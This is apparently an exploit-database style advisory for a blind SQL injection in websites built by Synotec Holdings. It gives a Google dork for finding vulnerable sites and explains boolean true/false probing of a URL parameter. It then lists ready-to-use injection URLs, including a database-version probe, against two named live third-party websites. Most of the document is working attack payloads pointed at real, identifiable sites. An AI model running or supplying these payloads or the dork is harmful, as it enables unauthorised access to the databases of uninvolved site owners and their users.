********************************************************* #Exploit Title: Synotec Holdings - Blind Sql Injection Vulnerability #Date: 2025-05-09 #Exploit Author: Behrouz Mansoori #Google Dork: "Website By : Synotec Holdings (Pvt) Ltd" #Category:webapps #Tested On: mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://samara.lk/view-product.php?id=36%20and%20true-- * https://samara.lk/view-product.php?id=36%20and%20false-- * https://samara.lk/view-product.php?id=36%20and%20substring(@@version,1,1)=1-- ### Demo 2: * https://hotelengineers.lk/view-member.php?id=16%20and%20true-- * https://hotelengineers.lk/view-member.php?id=16%20and%20false-- * https://hotelengineers.lk/view-member.php?id=16%20and%20substring(@@version,1,1)=1-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************